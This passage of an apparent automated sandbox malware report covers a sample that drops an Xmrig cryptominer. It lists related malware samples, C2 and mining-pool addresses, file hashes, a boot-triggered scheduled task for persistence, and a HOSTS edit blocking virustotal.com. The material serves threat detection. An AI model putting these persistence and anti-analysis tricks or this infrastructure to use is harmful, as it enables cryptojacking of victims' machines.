                                                                                            • pastebin.com/raw/sA04Mwk2
                                                                                            cr_asm_hiddenz.ps1Get hashmaliciousAsyncRAT, XWormBrowse
                                                                                            • pastebin.com/raw/sA04Mwk2
                                                                                            54.37.137.114gaozw40v.exeGet hashmaliciousXmrigBrowse
                                                                                              file.exeGet hashmaliciousXmrigBrowse
                                                                                                file.exeGet hashmaliciousXmrigBrowse
                                                                                                  SecuriteInfo.com.Trojan.Siggen29.54948.7115.19193.exeGet hashmaliciousXmrigBrowse
                                                                                                    ft1i6jvAdD.exeGet hashmaliciousXmrigBrowse
                                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                      pastebin.comCRf9KBk4ra.exeGet hashmaliciousDCRatBrowse
                                                                                                      • 172.67.19.24
                                                                                                      dF66DKQP7u.exeGet hashmaliciousXWormBrowse
                                                                                                      • 104.20.3.235
                                                                                                      2QaN4hOyJs.exeGet hashmaliciousXWormBrowse
                                                                                                      • 104.20.3.235
                                                                                                      bad.txtGet hashmaliciousAsyncRATBrowse
                                                                                                      • 104.20.3.235
                                                                                                      dlhost.exeGet hashmaliciousXWormBrowse
                                                                                                      • 104.20.4.235
                                                                                                      htkeUc1zJ0.exeGet hashmaliciousUnknownBrowse
                                                                                                      • 104.20.4.235
                                                                                                      c2.exeGet hashmaliciousXmrigBrowse
                                                                                                      • 104.20.4.235
                                                                                                      Instruction_695-18112-002_Rev.PDF.lnk (2).d.lnkGet hashmaliciousUnknownBrowse
                                                                                                      • 172.67.19.24
                                                                                                      RdLfpZY5A9.exeGet hashmalicious77Rootkit, XWormBrowse
                                                                                                      • 104.20.4.235
                                                                                                      file.exeGet hashmaliciousXWormBrowse
                                                                                                      • 172.67.19.24
                                                                                                      xmr-eu1.nanopool.orgaAcx14Rjtw.exeGet hashmaliciousXmrigBrowse
                                                                                                      • 51.15.65.182
                                                                                                      gaozw40v.exeGet hashmaliciousXmrigBrowse
                                                                                                      • 51.89.23.91
                                                                                                      file.exeGet hashmaliciousXmrigBrowse
                                                                                                      • 54.37.232.103
                                                                                                      nlGOh9K5X5.exeGet hashmaliciousXmrigBrowse
                                                                                                      • 51.15.58.224
                                                                                                      LfHJdrALlh.exeGet hashmaliciousXmrigBrowse
                                                                                                      • 51.15.58.224
                                                                                                      rLaC8kO1rD.exeGet hashmaliciousXmrigBrowse
                                                                                                      • 51.15.65.182
                                                                                                      6xQ8CMUaES.exeGet hashmaliciousXmrigBrowse
                                                                                                      • 51.89.23.91
                                                                                                      4o8Tgrb384.exeGet hashmaliciousXmrigBrowse
                                                                                                      • 51.15.65.182
                                                                                                      rtYpMDeKUq.exeGet hashmaliciousXmrigBrowse
                                                                                                      • 51.89.23.91
                                                                                                      NH95Vhokye.exeGet hashmaliciousXmrigBrowse
                                                                                                      • 54.37.137.114
                                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                      OnlineSASFR8p5iD52knN.exeGet hashmaliciousAzorultBrowse
                                                                                                      • 51.15.241.168
                                                                                                      loligang.x86.elfGet hashmaliciousMiraiBrowse
                                                                                                      • 212.129.47.239
                                                                                                      arm5.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                                                                                      • 62.210.51.189
                                                                                                      nsharm5.elfGet hashmaliciousMiraiBrowse
                                                                                                      • 51.159.173.14
                                                                                                      nsharm.elfGet hashmaliciousMiraiBrowse
                                                                                                      • 163.172.143.216
                                                                                                      mipsel.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                                                                                      • 51.158.216.108
                                                                                                      StGx54oFh6.exeGet hashmaliciousQuasarBrowse
                                                                                                      • 51.15.17.193
                                                                                                      1AqzGcCKey.exeGet hashmaliciousQuasarBrowse
                                                                                                      • 51.15.17.193
                                                                                                      BJtvb5Vdhh.exeGet hashmaliciousQuasarBrowse
                                                                                                      • 51.15.17.193
                                                                                                      HquJT7q6xG.exeGet hashmaliciousQuasarBrowse
                                                                                                      • 51.15.17.193
                                                                                                      OVHFRfile.exeGet hashmaliciousXmrigBrowse
                                                                                                      • 51.222.200.133
                                                                                                      https://ntta.org-pay-u5ch.sbs/us/Get hashmaliciousUnknownBrowse
                                                                                                      • 54.38.113.4
                                                                                                      NOTIFICATION_OF_DEPENDANTS_1.vbsGet hashmaliciousXmrigBrowse
                                                                                                      • 51.222.200.133
                                                                                                      NOTIFICATION_OF_DEPENDANTS.vbsGet hashmaliciousXmrigBrowse
                                                                                                      • 51.222.106.253
                                                                                                      cxZuGa.exeGet hashmaliciousUnknownBrowse
                                                                                                      • 139.99.188.124
                                                                                                      https://tr171139818.amoliani.com/c/mm14r39/e-v_xxa-/imz77nt3npsGet hashmaliciousUnknownBrowse
                                                                                                      • 213.32.5.20
                                                                                                      book-captcha.com.htmlGet hashmaliciousCAPTCHA Scam ClickFixBrowse
                                                                                                      • 91.134.9.159
                                                                                                      armv7l.elfGet hashmaliciousUnknownBrowse
                                                                                                      • 91.134.44.56
                                                                                                      aAcx14Rjtw.exeGet hashmaliciousXmrigBrowse
                                                                                                      • 146.59.154.106
                                                                                                      DF2.exeGet hashmaliciousUnknownBrowse
                                                                                                      • 51.83.132.16
                                                                                                      CLOUDFLARENETUShttp://hotelyetipokhara.comGet hashmaliciousUnknownBrowse
                                                                                                      • 104.21.96.1
                                                                                                      https://realpaperworks.com/wp-content/red/UhPIYaGet hashmaliciousUnknownBrowse
                                                                                                      • 104.21.96.1
                                                                                                      http://adflowtube.comGet hashmaliciousUnknownBrowse
                                                                                                      • 188.114.96.3
                                                                                                      http://authmycookie.comGet hashmaliciousUnknownBrowse
                                                                                                      • 172.67.198.196
                                                                                                      http://keywestlending.comGet hashmaliciousCAPTCHA Scam ClickFixBrowse
                                                                                                      • 172.64.154.248
                                                                                                      http://vaporblastingservices.comGet hashmaliciousUnknownBrowse
                                                                                                      • 104.18.26.193
                                                                                                      file.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                      • 188.114.96.3
                                                                                                      file.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                      • 188.114.97.3
                                                                                                      file.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                      • 188.114.96.3
                                                                                                      file.exeGet hashmaliciousLummaCBrowse
                                                                                                      • 172.67.157.254
                                                                                                      No context
                                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                      C:\Users\user\AppData\Local\Temp\bzqlyietdwsj.tmpbased.exeGet hashmaliciousDCRat, PureLog Stealer, Xmrig, zgRATBrowse
                                                                                                        setup.exeGet hashmaliciousUnknownBrowse
                                                                                                          iqA8j9yGcd.exeGet hashmaliciousHackBrowser, DCRat, Discord Token Stealer, Millenuim RAT, PureLog Stealer, zgRATBrowse
                                                                                                            VaTlw2kNGc.exeGet hashmaliciousBlank Grabber, DCRat, PureLog Stealer, Xmrig, zgRATBrowse
                                                                                                              87Bym0x4Fy.exeGet hashmaliciousBlank Grabber, DCRat, Discord Rat, PureLog Stealer, Xmrig, zgRATBrowse
                                                                                                                8Ck8T5qRcC.exeGet hashmaliciousBlank Grabber, DCRat, PureLog Stealer, Xmrig, zgRATBrowse
                                                                                                                  TS-240605-Millenium1.exeGet hashmaliciousBlank Grabber, Discord Token Stealer, Millenuim RAT, XmrigBrowse
                                                                                                                    DevxExecutor.exeGet hashmaliciousPython Stealer, Blank Grabber, CStealer, Discord Token Stealer, Millenuim RATBrowse
                                                                                                                      hacn.exeGet hashmaliciousDiscord Token Stealer, Millenuim RAT, XmrigBrowse
                                                                                                                        SecuriteInfo.com.Win64.Evo-gen.25073.24639.exeGet hashmaliciousUnknownBrowse
                                                                                                                          Process:C:\Users\user\Desktop\hiwA7Blv7C.exe
                                                                                                                          File Type:PE32+ executable (GUI) x86-64 (stripped to external PDB), for MS Windows
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):5925152
                                                                                                                          Entropy (8bit):7.664425949989934
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:98304:iOKxam2uqpBZuVEqrPb/1wLpH6zjH5O8MJcZycvM+PvwwDqxmzN2TP4q:znvPZuVEqrPb/1YyZkJR+PYwmwS4q
                                                                                                                          MD5:7BF019893EB8DF6FC169E8F9EF5269C6
                                                                                                                          SHA1:41FCC57F71768D9DF534632D3D7C52138D59E3E1
                                                                                                                          SHA-256:882B403DCC4C6928DE9D4A86BF4FBB650909485E828CBA37258D68BE81340739
                                                                                                                          SHA-512:280EE6D446B1261AC2A5ECDC1ECC30DAA073EBFB4FC6864040CA4AD23D89FF2D912528DF56CFA2CDE9012AA6DDB60108BEB60982DBF710D2670ABA7E90A99352
                                                                                                                          Malicious:true
                                                                                                                          Antivirus:
                                                                                                                          • Antivirus: Avira, Detection: 100%
                                                                                                                          • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                          • Antivirus: ReversingLabs, Detection: 61%
                                                                                                                          Preview:MZ......................@.......................................hr......!..L.!This program cannot be run in DOS mode....$.......PE..d......................(.P...<Z................@..............................Z.......Z...`... ...............................................Z.......Z......@Z.$....@Z. )....Z.x............................2Z.(.....................Z.`............................text....O.......P..................`..`.data.....Y..`....Y..T..............@....rdata.. .... Z.......Z.............@..@.pdata..$....@Z......"Z.............@..@.xdata..H....PZ......*Z.............@..@.bss....`....`Z..........................idata........Z......0Z.............@....CRT....`.....Z......6Z.............@....tls..........Z......8Z.............@....rsrc.........Z......:Z.............@....reloc..x.....Z......>Z.............@..B........................................................................................................................................................................
                                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):64
                                                                                                                          Entropy (8bit):1.1940658735648508
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:3:Nlllulbnolz:NllUc
                                                                                                                          MD5:F23953D4A58E404FCB67ADD0C45EB27A
                                                                                                                          SHA1:2D75B5CACF2916C66E440F19F6B3B21DFD289340
                                                                                                                          SHA-256:16F994BFB26D529E4C28ED21C6EE36D4AFEAE01CEEB1601E85E0E7FDFF4EFA8B
                                                                                                                          SHA-512:B90BFEC26910A590A367E8356A20F32A65DB41C6C62D79CA0DDCC8D95C14EB48138DEC6B992A6E5C7B35CFF643063012462DA3E747B2AA15721FE2ECCE02C044
                                                                                                                          Malicious:false
                                                                                                                          Preview:@...e................................................@..........
                                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):60
                                                                                                                          Entropy (8bit):4.038920595031593
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                          Malicious:false
                                                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):60
                                                                                                                          Entropy (8bit):4.038920595031593
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                          Malicious:false
                                                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):60
                                                                                                                          Entropy (8bit):4.038920595031593
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                          Malicious:false
                                                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):60
                                                                                                                          Entropy (8bit):4.038920595031593
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                          Malicious:false
                                                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                          Process:C:\Users\user\Desktop\hiwA7Blv7C.exe
                                                                                                                          File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):161792
                                                                                                                          Entropy (8bit):5.8318794599287465
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:3072:lQbW78Kb89UMmY8MA1cRWr7BiKcOO1Sf7lHn4mr3yo4f8P2:lQK75bobwfBiKCYfhHLU5
                                                                                                                          MD5:1667C96053EAA078109F8B0C9500FC9D
                                                                                                                          SHA1:E0F567763BAAAA757F66F96951D9810F45F69F30
                                                                                                                          SHA-256:F7E1E53A6FB24A2BD9206305C59448A8F99B6F5847A6ACB18EB0FD9F7383FFB4
                                                                                                                          SHA-512:6285ADE5CB85B71814EDD57EDDC512A031596043B7FCE4FCC909A0B78ECFE161C062AD0637EC82CBDAA36675AD32FBD0C94DDD96BB575BE8B1FBB47DF706AAE1
                                                                                                                          Malicious:true
                                                                                                                          Antivirus:
                                                                                                                          • Antivirus: Avira, Detection: 100%
                                                                                                                          • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                          • Antivirus: ReversingLabs, Detection: 87%
                                                                                                                          Joe Sandbox View:
                                                                                                                          • Filename: based.exe, Detection: malicious, Browse
                                                                                                                          • Filename: setup.exe, Detection: malicious, Browse
                                                                                                                          • Filename: iqA8j9yGcd.exe, Detection: malicious, Browse
                                                                                                                          • Filename: VaTlw2kNGc.exe, Detection: malicious, Browse
                                                                                                                          • Filename: 87Bym0x4Fy.exe, Detection: malicious, Browse
                                                                                                                          • Filename: 8Ck8T5qRcC.exe, Detection: malicious, Browse
                                                                                                                          • Filename: TS-240605-Millenium1.exe, Detection: malicious, Browse
                                                                                                                          • Filename: DevxExecutor.exe, Detection: malicious, Browse
                                                                                                                          • Filename: hacn.exe, Detection: malicious, Browse
                                                                                                                          • Filename: SecuriteInfo.com.Win64.Evo-gen.25073.24639.exe, Detection: malicious, Browse
                                                                                                                          Preview:MZ......................@.......................................sr......!..L.!This program cannot be run in DOS mode....$.......K...............D.......D...........o...9A......9A9.....9A......Rich............PE..d....t.d.........."....%.....X......X".........@..........................................`..................................................8.......p..`>...`..8....................5..8............................................0...............................text............................... ..`.rdata.......0......."..............@..@.data........P......................@....pdata..8....`.......6..............@..@.rsrc...`>...p...@...8..............@..@........................................................................................................................................................................................................................................................................................................................................
                                                                                                                          Process:C:\Users\user\Desktop\hiwA7Blv7C.exe
                                                                                                                          File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1490
                                                                                                                          Entropy (8bit):5.1015990235428035
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:24:2dk4+SkIMFWYL60YeGlMhEMjn5pwjpILUYODOLqx49RJh7h8gJ15E15LNEB86tn:cC3IQDL60uydbQ9IIYODOLqOdq2sbEx
                                                                                                                          MD5:546D67A48FF2BF7682CEA9FAC07B942E
                                                                                                                          SHA1:A2CB3A9A97FD935B5E62D4C29B3E2C5AB7D5FC90
                                                                                                                          SHA-256:EFF7EDC19E6C430AAECA7EA8A77251C74D1E9ABB79B183A9EE1F58C2934B4B6A
                                                                                                                          SHA-512:10D90EDF31C0955BCEC52219D854952FD38768BD97E8E50D32A1237BCCAF1A5EB9F824DA0F81A7812E0CE62C0464168DD0201D1C0EB61B9FE253FE7C89DE05FE
                                                                                                                          Malicious:false
                                                                                                                          Preview:<?xml version="1.0" encoding="UTF-16"?>..<Task version="1.3" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">.. <Triggers>.. <BootTrigger>.. . <Enabled>true</Enabled>.. </BootTrigger>.. </Triggers>.. <Principals>.. <Principal id="Author">... <RunLevel>HighestAvailable</RunLevel>.. </Principal>.. </Principals>.. <Settings>.. <MultipleInstancesPolicy>IgnoreNew</MultipleInstancesPolicy>.. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>.. <StopIfGoingOnBatteries>false</StopIfGoingOnBatteries>.. <AllowHardTerminate>false</AllowHardTerminate>.. <StartWhenAvailable>false</StartWhenAvailable>.. <RunOnlyIfNetworkAvailable>false</RunOnlyIfNetworkAvailable>.. <IdleSettings>.. <Duration>PT10M</Duration>.. <WaitTimeout>PT1H</WaitTimeout>.. <StopOnIdleEnd>false</StopOnIdleEnd>.. <RestartOnIdle>false</RestartOnIdle>.. </IdleSettings>.. <AllowStartOnDemand>true</AllowStartOnDemand>.. <Enabled>true</Enabl
                                                                                                                          Process:C:\Windows\System32\svchost.exe
                                                                                                                          File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                          Category:modified
                                                                                                                          Size (bytes):4680
                                                                                                                          Entropy (8bit):3.7113762133371053
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:96:pYMguQII4i5m6h4aGdinipV9ll7UY5HAmzQ+:9A4U/xne7HO+
                                                                                                                          MD5:5F3BB20D4CDB0EED283ECCDCD53478CE
                                                                                                                          SHA1:CF2566DBB83624692B075C1F9FE90FA07653CBD8
                                                                                                                          SHA-256:EB0C47C06AD0AB5AC8031CD9B0B56BF18411EF22681AF3868086077FEC0E7110
                                                                                                                          SHA-512:7BDF4CF755CC40ED68BF84D5C9851A7D1480C0A2C332A688E7BB07F9EA34E18E7B5A6382B3C6611517BE213F4DC25F6169FDA07BFB196BE424EDA57BDF9C8F26
                                                                                                                          Malicious:false
                                                                                                                          Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.T.a.s.k. .v.e.r.s.i.o.n.=.".1...6.". .x.m.l.n.s.=.".h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n.d.o.w.s./.2.0.0.4./.0.2./.m.i.t./.t.a.s.k.".>..... . .<.R.e.g.i.s.t.r.a.t.i.o.n.I.n.f.o.>..... . . . .<.S.o.u.r.c.e.>.$.(.@.%.s.y.s.t.e.m.r.o.o.t.%.\.s.y.s.t.e.m.3.2.\.s.p.p.c...d.l.l.,.-.2.0.0.).<./.S.o.u.r.c.e.>..... . . . .<.A.u.t.h.o.r.>.$.(.@.%.s.y.s.t.e.m.r.o.o.t.%.\.s.y.s.t.e.m.3.2.\.s.p.p.c...d.l.l.,.-.2.0.0.).<./.A.u.t.h.o.r.>..... . . . .<.V.e.r.s.i.o.n.>.1...0.<./.V.e.r.s.i.o.n.>..... . . . .<.D.e.s.c.r.i.p.t.i.o.n.>.$.(.@.%.s.y.s.t.e.m.r.o.o.t.%.\.s.y.s.t.e.m.3.2.\.s.p.p.c...d.l.l.,.-.2.0.1.).<./.D.e.s.c.r.i.p.t.i.o.n.>..... . . . .<.U.R.I.>.\.M.i.c.r.o.s.o.f.t.\.W.i.n.d.o.w.s.\.S.o.f.t.w.a.r.e.P.r.o.t.e.c.t.i.o.n.P.l.a.t.f.o.r.m.\.S.v.c.R.e.s.t.a.r.t.T.a.s.k.<./.U.R.I.>..... . . . .<.S.e.c.u.r.i.t.y.D.e.s.c.r.i.p.t.o.r.>.D.:.P.(.A.;.;.F.A.;.;.;.S.Y.).(.A.;.;.F.A.;.;.;.B.A.).
                                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):64
                                                                                                                          Entropy (8bit):0.34726597513537405
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:3:Nlll:Nll
                                                                                                                          MD5:446DD1CF97EABA21CF14D03AEBC79F27
                                                                                                                          SHA1:36E4CC7367E0C7B40F4A8ACE272941EA46373799
                                                                                                                          SHA-256:A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
                                                                                                                          SHA-512:A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
                                                                                                                          Malicious:false
                                                                                                                          Preview:@...e...........................................................
                                                                                                                          Process:C:\Users\user\Desktop\hiwA7Blv7C.exe
                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):858
                                                                                                                          Entropy (8bit):4.68208976727935
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:24:QWDZh+ragzMZfuMMs1L/JU5fFCkK8T1rTt8:vDZhyoZWM9rU5fFcV
                                                                                                                          MD5:0008F4A213BC7885A8CCEB5417578349
                                                                                                                          SHA1:877DE0BFE93C374E066A0F7707580A1280B7F959
                                                                                                                          SHA-256:9F2250A4FFE3ACC970FAAD53D5F89BB90F8B8D5B48EBD60A69CD00C9ACD029FF
                                                                                                                          SHA-512:DFBFB7EEE1482E0C979B6BE7F0D16CE965EDB362C66DB1E89FE17F5FA8717D7A19553906A9A9BB2501873496916F7FC45136E87B871AF4BEE3E979301659E7F3
                                                                                                                          Malicious:true
                                                                                                                          Preview:# Copyright (c) 1993-2009 Microsoft Corp...#..# This is a sample HOSTS file used by Microsoft TCP/IP for Windows...#..# This file contains the mappings of IP addresses to host names. Each..# entry should be kept on an individual line. The IP address should..# be placed in the first column followed by the corresponding host name...# The IP address and the host name should be separated by at least one..# space...#..# Additionally, comments (such as these) may be inserted on individual..# lines or following the machine name denoted by a '#' symbol...#..# For example:..#..# 102.54.94.97 rhino.acme.com # source server..# 38.25.63.10 x.acme.com # x client host....# localhost name resolution is handled within DNS itself...#.127.0.0.1 localhost..#.::1 localhost....0.0.0.0 www.virustotal.com
                                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):60
                                                                                                                          Entropy (8bit):4.038920595031593
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                          Malicious:false
                                                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):60
                                                                                                                          Entropy (8bit):4.038920595031593
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                          Malicious:false
                                                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):60
                                                                                                                          Entropy (8bit):4.038920595031593
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                          Malicious:false
                                                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):60
                                                                                                                          Entropy (8bit):4.038920595031593
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                          Malicious:false
                                                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                          Process:C:\Program Files\Google\Chrome\updater.exe
                                                                                                                          File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):5651456
                                                                                                                          Entropy (8bit):6.686504811317419
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:98304:arBrt3+RH2GEo/L7pdenlL17ouknW3jZAk3cB0vyRfgIlFQSmf1JjGGI0:aj3+RZyjZn3c5RYIlGLfjGGI
                                                                                                                          MD5:71BA2926F4F302EA7524510B7A07CD28
                                                                                                                          SHA1:A9AE469CE440353F66FF604EDE55528F95D3F6BA
                                                                                                                          SHA-256:3D0E5AED0AFC5A7719AF93C49C55E6CE91ADFFE5CC50D1597ABB1CCED05FFAA3
                                                                                                                          SHA-512:3F6580D75D177222719A79E9AA79F6361D545AE5E3135D77D7C0C96C97C87A02E92F3EFEC8C21F0D4AB643DE8F8E261C0026C5015A00B0785A9FAC55CF187089
                                                                                                                          Malicious:true
                                                                                                                          Yara Hits:
                                                                                                                          • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: C:\Windows\Temp\bzqlyietdwsj.tmp, Author: Joe Security
                                                                                                                          • Rule: MacOS_Cryptominer_Xmrig_241780a1, Description: unknown, Source: C:\Windows\Temp\bzqlyietdwsj.tmp, Author: unknown
                                                                                                                          • Rule: MAL_XMR_Miner_May19_1, Description: Detects Monero Crypto Coin Miner, Source: C:\Windows\Temp\bzqlyietdwsj.tmp, Author: Florian Roth
                                                                                                                          • Rule: MALWARE_Win_CoinMiner02, Description: Detects coinmining malware, Source: C:\Windows\Temp\bzqlyietdwsj.tmp, Author: ditekSHen
                                                                                                                          Antivirus:
                                                                                                                          • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                          • Antivirus: ReversingLabs, Detection: 62%
